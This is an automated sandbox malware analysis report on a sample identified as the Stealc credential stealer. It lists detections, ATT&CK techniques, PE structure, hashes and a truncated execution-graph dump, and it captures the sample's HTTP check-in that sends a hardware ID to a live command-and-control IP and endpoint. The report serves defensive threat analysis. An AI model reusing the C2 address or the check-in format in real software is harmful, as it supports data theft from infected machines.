                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00657850 GetProcessHeap,RtlAllocateHeap,GetUserNameA
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exe | Code function: 0_2_00657A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.XDPT5mgIBO.exe.640000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: XDPT5mgIBO.exe PID: 5928, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                MITRE ATT&CK Matrix (the number in parentheses is the count the report shows next to that technique; techniques without a number had no hits)

                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Command and Scripting Interpreter (2); Native API (11); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Masquerading (1); Virtualization/Sandbox Evasion (33); Disable or Modify Tools (11); Process Injection (11); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (4); Software Packing (12); DLL Side-Loading (1)
                Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: System Time Discovery (2); Security Software Discovery (641); Virtualization/Sandbox Evasion (33); Process Discovery (13); Account Discovery (1); System Owner/User Discovery (1); File and Directory Discovery (1); System Information Discovery (324)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Encrypted Channel (2); Ingress Tool Transfer (2); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
                Source | Detection | Scanner | Label
                XDPT5mgIBO.exe | 54% | Virustotal |
                XDPT5mgIBO.exe | 100% | Avira | TR/Crypt.TPM.Gen
                XDPT5mgIBO.exe | 100% | Joe Sandbox ML |
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                Source | Detection | Scanner | Label
                http://185.215.113.37/ | 100% | URL Reputation | malware
                http://185.215.113.37 | 100% | URL Reputation | malware
                http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
                http://185.215.113.37/ws | 17% | Virustotal |
                No contacted domains info
                Name | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/ | true | URL Reputation: malware | unknown
                http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware; URL Reputation: malware | unknown
                Name | Source | Malicious | Antivirus Detection | Reputation
                http://185.215.113.37/e2b1563c6670f193.phpO9 | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php.G | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php09 | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e9 | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37 | XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
                http://185.215.113.37/ws | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37/e2b1563c6670f193.php&F | XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                http://185.215.113.37d | XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                IP | Domain | Country | ASN | ASN Name | Malicious
                185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                Joe Sandbox version: 41.0.0 Charoite
                Analysis ID: 1527619
                Start date and time: 2024-10-07 06:46:08 +02:00
                Joe Sandbox product: CloudBasic
                Overall analysis duration: 0h 5m 14s
                Hypervisor based Inspection enabled: false
                Report type: full
                Cookbook file name: default.jbs
                Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of new started processes analysed: 8
                Number of new started drivers analysed: 0
                Number of existing processes analysed: 0
                Number of existing drivers analysed: 0
                Number of injected processes analysed: 0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode: default
                Analysis stop reason: Timeout
                Sample name: XDPT5mgIBO.exe
                renamed because original name is a hash value
                Original Sample Name: 6764f657774334189cbecc80dbb3c855.exe
                Detection: MAL
                Classification: mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 93
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            No simulations
                Match: 185.215.113.37
                Associated Sample Name / URL | Detection | Threat Name | Context
                p7SnjaA8NN.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                8ObkdHP9Hq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.37/e2b1563c6670f193.php
                MSCy5UvBYg.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            No context
                Match: WHOLESALECONNECTIONSNL
                Associated Sample Name / URL | Detection | Threat Name | Context
                p7SnjaA8NN.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc, Vidar | 185.215.113.103
                TVyKPaL2h0.exe | malicious | Amadey | 185.215.113.103
                bUyvu6YU2H.exe | malicious | Amadey | 185.215.113.19
                8ObkdHP9Hq.exe | malicious | LummaC, Amadey, Credential Flusher, Stealc | 185.215.113.103
                MSCy5UvBYg.exe | malicious | LummaC, Amadey, Stealc, Vidar | 185.215.113.103
                1mqzOM6eok.exe | malicious | Xmrig | 185.215.113.66
                http://noevirbrasil.com/hello.html | malicious | Unknown | 185.215.113.14
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                file.exe | malicious | Stealc | 185.215.113.37
                file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                File type: PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit): 7.945676055051362
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name: XDPT5mgIBO.exe
                File size: 1'852'416 bytes
                MD5: 6764f657774334189cbecc80dbb3c855
                SHA1: 9f597f7e92400f0c83f6166d1ec4a9228b3c5514
                SHA256: ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
                SHA512: 059e54f80ce83028394544299e34e8315b09370ae59defb37b48ce038d749f10b650e5328a6e8a932a8cb7575e92d88e2ee78c337d7d2e347cf42d35c930baa8
                SSDEEP: 49152:/3PScI/Nkko97NjUtnBi1BEVE1WoqsaRz4fpA:/3g/NbC7NAi1BeoqbRz4C
                TLSH: 7F8533A6E7BE57B3FB4D6A77648E833FE7657CABC0780F708E56290444508819BD31A0
                File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                Icon Hash: 00928e8e8686b000
                Entrypoint: 0xa9d000
                Entrypoint Section: .taggant
                Digitally signed: false
                Imagebase: 0x400000
                Subsystem: windows gui
                Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major: 5
                OS Version Minor: 1
                File Version Major: 5
                File Version Minor: 1
                Subsystem Version Major: 5
                Subsystem Version Minor: 1
                Import Hash: 2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FA3D4ECC2EAh
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                Name | Virtual Address | Virtual Size | Is in Section
                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                            Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                            (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 48ef81f97f6bd954509670c101ad5128 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            (unnamed) | 0x25e000 | 0x2a0000 | 0x200 | ee31bfc8f7dd8fa704e46b147b832605 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            ogawuknu | 0x4fe000 | 0x19e000 | 0x19e000 | 2b95466ecef938129c8a92b950d42409 | False | 0.9949054810160024 | data | 7.953433173066681 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            hgmhlbrt | 0x69c000 | 0x1000 | 0x600 | b6f75f94812208bf5a0e190e6b77e611 | False | 0.6080729166666666 | data | 5.243335117850986 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            .taggant | 0x69d000 | 0x3000 | 0x2200 | bb2e74c558225f6703f7eaae029ed961 | False | 0.05974264705882353 | DOS executable (COM) | 0.5540394660150704 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            DLL | Import
                            kernel32.dll | lstrcpy
                            Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                            2024-10-07T06:47:05.536145+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | TCP
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Oct 7, 2024 06:47:03.930320978 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:03.935285091 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                            Oct 7, 2024 06:47:03.935411930 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:03.943397045 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:03.948288918 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                            Oct 7, 2024 06:47:05.275372982 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                            Oct 7, 2024 06:47:05.275547981 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:05.285645008 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:05.290811062 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                            Oct 7, 2024 06:47:05.534358025 CEST | 80 | 49711 | 185.215.113.37 | 192.168.2.6
                            Oct 7, 2024 06:47:05.536144972 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Oct 7, 2024 06:47:08.354746103 CEST | 49711 | 80 | 192.168.2.6 | 185.215.113.37
                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Oct 7, 2024 06:47:18.280030012 CEST | 53 | 54896 | 1.1.1.1 | 192.168.2.6
                            • 185.215.113.37
                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            0 | 192.168.2.6 | 49711 | 185.215.113.37 | 80 | 5928 | C:\Users\user\Desktop\XDPT5mgIBO.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Oct 7, 2024 06:47:03.943397045 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Oct 7, 2024 06:47:05.275372982 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 04:47:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Oct 7, 2024 06:47:05.285645008 CEST | 412 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAA
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a
                            Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
                            Oct 7, 2024 06:47:05.534358025 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Mon, 07 Oct 2024 04:47:05 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=



                            Target ID:0
                            Start time:00:46:58
                            Start date:07/10/2024
                            Path:C:\Users\user\Desktop\XDPT5mgIBO.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\XDPT5mgIBO.exe"
                            Imagebase:0x640000
                            File size:1'852'416 bytes
                            MD5 hash:6764F657774334189CBECC80DBB3C855
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
14438 6445c0 2 API calls 14437->14438 14439 64420c 14438->14439 14440 6445c0 2 API calls 14439->14440 14441 644225 14440->14441 14442 6445c0 2 API calls 14441->14442 14443 64423e 14442->14443 14444 6445c0 2 API calls 14443->14444 14445 644257 14444->14445 14446 6445c0 2 API calls 14445->14446 14447 644270 14446->14447 14448 6445c0 2 API calls 14447->14448 14449 644289 14448->14449 14450 6445c0 2 API calls 14449->14450 14451 6442a2 14450->14451 14452 6445c0 2 API calls 14451->14452 14453 6442bb 14452->14453 14454 6445c0 2 API calls 14453->14454 14455 6442d4 14454->14455 14456 6445c0 2 API calls 14455->14456 14457 6442ed 14456->14457 14458 6445c0 2 API calls 14457->14458 14459 644306 14458->14459 14460 6445c0 2 API calls 14459->14460 14461 64431f 14460->14461 14462 6445c0 2 API calls 14461->14462 14463 644338 14462->14463 14464 6445c0 2 API calls 14463->14464 14465 644351 14464->14465 14466 6445c0 2 API calls 14465->14466 14467 64436a 14466->14467 14468 6445c0 2 API calls 14467->14468 14469 644383 14468->14469 14470 6445c0 2 API calls 14469->14470 14471 64439c 14470->14471 14472 6445c0 2 API calls 14471->14472 14473 6443b5 14472->14473 14474 6445c0 2 API calls 14473->14474 14475 6443ce 14474->14475 14476 6445c0 2 API calls 14475->14476 14477 6443e7 14476->14477 14478 6445c0 2 API calls 14477->14478 14479 644400 14478->14479 14480 6445c0 2 API calls 14479->14480 14481 644419 14480->14481 14482 6445c0 2 API calls 14481->14482 14483 644432 14482->14483 14484 6445c0 2 API calls 14483->14484 14485 64444b 14484->14485 14486 6445c0 2 API calls 14485->14486 14487 644464 14486->14487 14488 6445c0 2 API calls 14487->14488 14489 64447d 14488->14489 14490 6445c0 2 API calls 14489->14490 14491 644496 14490->14491 14492 6445c0 2 API calls 14491->14492 14493 6444af 14492->14493 14494 6445c0 2 API calls 14493->14494 14495 6444c8 14494->14495 14496 6445c0 2 API calls 14495->14496 14497 6444e1 14496->14497 14498 6445c0 2 API calls 14497->14498 14499 6444fa 14498->14499 14500 6445c0 2 
API calls 14499->14500 14501 644513 14500->14501 14502 6445c0 2 API calls 14501->14502 14503 64452c 14502->14503 14504 6445c0 2 API calls 14503->14504 14505 644545 14504->14505 14506 6445c0 2 API calls 14505->14506 14507 64455e 14506->14507 14508 6445c0 2 API calls 14507->14508 14509 644577 14508->14509 14510 6445c0 2 API calls 14509->14510 14511 644590 14510->14511 14512 6445c0 2 API calls 14511->14512 14513 6445a9 14512->14513 14514 659c10 14513->14514 14515 65a036 8 API calls 14514->14515 14516 659c20 43 API calls 14514->14516 14517 65a146 14515->14517 14518 65a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14515->14518 14516->14515 14519 65a216 14517->14519 14520 65a153 8 API calls 14517->14520 14518->14517 14521 65a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14519->14521 14522 65a298 14519->14522 14520->14519 14521->14522 14523 65a2a5 6 API calls 14522->14523 14524 65a337 14522->14524 14523->14524 14525 65a344 9 API calls 14524->14525 14526 65a41f 14524->14526 14525->14526 14527 65a4a2 14526->14527 14528 65a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14526->14528 14529 65a4dc 14527->14529 14530 65a4ab GetProcAddress GetProcAddress 14527->14530 14528->14527 14531 65a515 14529->14531 14532 65a4e5 GetProcAddress GetProcAddress 14529->14532 14530->14529 14533 65a612 14531->14533 14534 65a522 10 API calls 14531->14534 14532->14531 14535 65a67d 14533->14535 14536 65a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14533->14536 14534->14533 14537 65a686 GetProcAddress 14535->14537 14538 65a69e 14535->14538 14536->14535 14537->14538 14539 65a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14538->14539 14540 655ca3 14538->14540 14539->14540 14541 641590 14540->14541 15660 641670 14541->15660 14544 65a7a0 lstrcpy 14545 6415b5 14544->14545 14546 65a7a0 lstrcpy 14545->14546 14547 6415c7 14546->14547 14548 65a7a0 lstrcpy 14547->14548 14549 
6415d9 14548->14549 14550 65a7a0 lstrcpy 14549->14550 14551 641663 14550->14551 14552 655510 14551->14552 14553 655521 14552->14553 14554 65a820 2 API calls 14553->14554 14555 65552e 14554->14555 14556 65a820 2 API calls 14555->14556 14557 65553b 14556->14557 14558 65a820 2 API calls 14557->14558 14559 655548 14558->14559 14560 65a740 lstrcpy 14559->14560 14561 655555 14560->14561 14562 65a740 lstrcpy 14561->14562 14563 655562 14562->14563 14564 65a740 lstrcpy 14563->14564 14565 65556f 14564->14565 14566 65a740 lstrcpy 14565->14566 14606 65557c 14566->14606 14567 65a740 lstrcpy 14567->14606 14568 65a7a0 lstrcpy 14568->14606 14569 655643 StrCmpCA 14569->14606 14570 6556a0 StrCmpCA 14571 6557dc 14570->14571 14570->14606 14572 65a8a0 lstrcpy 14571->14572 14573 6557e8 14572->14573 14574 65a820 2 API calls 14573->14574 14576 6557f6 14574->14576 14575 65a820 lstrlen lstrcpy 14575->14606 14579 65a820 2 API calls 14576->14579 14577 655856 StrCmpCA 14580 655991 14577->14580 14577->14606 14578 6551f0 20 API calls 14578->14606 14582 655805 14579->14582 14581 65a8a0 lstrcpy 14580->14581 14583 65599d 14581->14583 14584 641670 lstrcpy 14582->14584 14586 65a820 2 API calls 14583->14586 14604 655811 14584->14604 14585 641590 lstrcpy 14585->14606 14587 6559ab 14586->14587 14590 65a820 2 API calls 14587->14590 14588 655a0b StrCmpCA 14591 655a16 Sleep 14588->14591 14592 655a28 14588->14592 14589 6552c0 25 API calls 14589->14606 14593 6559ba 14590->14593 14591->14606 14594 65a8a0 lstrcpy 14592->14594 14596 641670 lstrcpy 14593->14596 14597 655a34 14594->14597 14595 65a8a0 lstrcpy 14595->14606 14596->14604 14598 65a820 2 API calls 14597->14598 14599 655a43 14598->14599 14600 65a820 2 API calls 14599->14600 14602 655a52 14600->14602 14601 65578a StrCmpCA 14601->14606 14603 641670 lstrcpy 14602->14603 14603->14604 14604->13659 14605 65593f StrCmpCA 14605->14606 14606->14567 14606->14568 14606->14569 14606->14570 14606->14575 14606->14577 14606->14578 14606->14585 14606->14588 
14606->14589 14606->14595 14606->14601 14606->14605 14608 657553 GetVolumeInformationA 14607->14608 14609 65754c 14607->14609 14610 657591 14608->14610 14609->14608 14611 6575fc GetProcessHeap RtlAllocateHeap 14610->14611 14612 657619 14611->14612 14613 657628 wsprintfA 14611->14613 14615 65a740 lstrcpy 14612->14615 14614 65a740 lstrcpy 14613->14614 14616 655da7 14614->14616 14615->14616 14616->13680 14618 65a7a0 lstrcpy 14617->14618 14619 644899 14618->14619 15669 6447b0 14619->15669 14621 6448a5 14622 65a740 lstrcpy 14621->14622 14623 6448d7 14622->14623 14624 65a740 lstrcpy 14623->14624 14625 6448e4 14624->14625 14626 65a740 lstrcpy 14625->14626 14627 6448f1 14626->14627 14628 65a740 lstrcpy 14627->14628 14629 6448fe 14628->14629 14630 65a740 lstrcpy 14629->14630 14631 64490b InternetOpenA StrCmpCA 14630->14631 14632 644944 14631->14632 14633 644ecb InternetCloseHandle 14632->14633 15675 658b60 14632->15675 14635 644ee8 14633->14635 15690 649ac0 CryptStringToBinaryA 14635->15690 14636 644963 15683 65a920 14636->15683 14639 644976 14641 65a8a0 lstrcpy 14639->14641 14647 64497f 14641->14647 14642 65a820 2 API calls 14643 644f05 14642->14643 14644 65a9b0 4 API calls 14643->14644 14646 644f1b 14644->14646 14645 644f27 codecvt 14649 65a7a0 lstrcpy 14645->14649 14648 65a8a0 lstrcpy 14646->14648 14650 65a9b0 4 API calls 14647->14650 14648->14645 14661 644f57 14649->14661 14651 6449a9 14650->14651 14652 65a8a0 lstrcpy 14651->14652 14653 6449b2 14652->14653 14654 65a9b0 4 API calls 14653->14654 14655 6449d1 14654->14655 14656 65a8a0 lstrcpy 14655->14656 14657 6449da 14656->14657 14658 65a920 3 API calls 14657->14658 14659 6449f8 14658->14659 14660 65a8a0 lstrcpy 14659->14660 14662 644a01 14660->14662 14661->13683 14663 65a9b0 4 API calls 14662->14663 14664 644a20 14663->14664 14665 65a8a0 lstrcpy 14664->14665 14666 644a29 14665->14666 14667 65a9b0 4 API calls 14666->14667 14668 644a48 14667->14668 14669 65a8a0 lstrcpy 14668->14669 14670 644a51 14669->14670 14671 65a9b0 4 
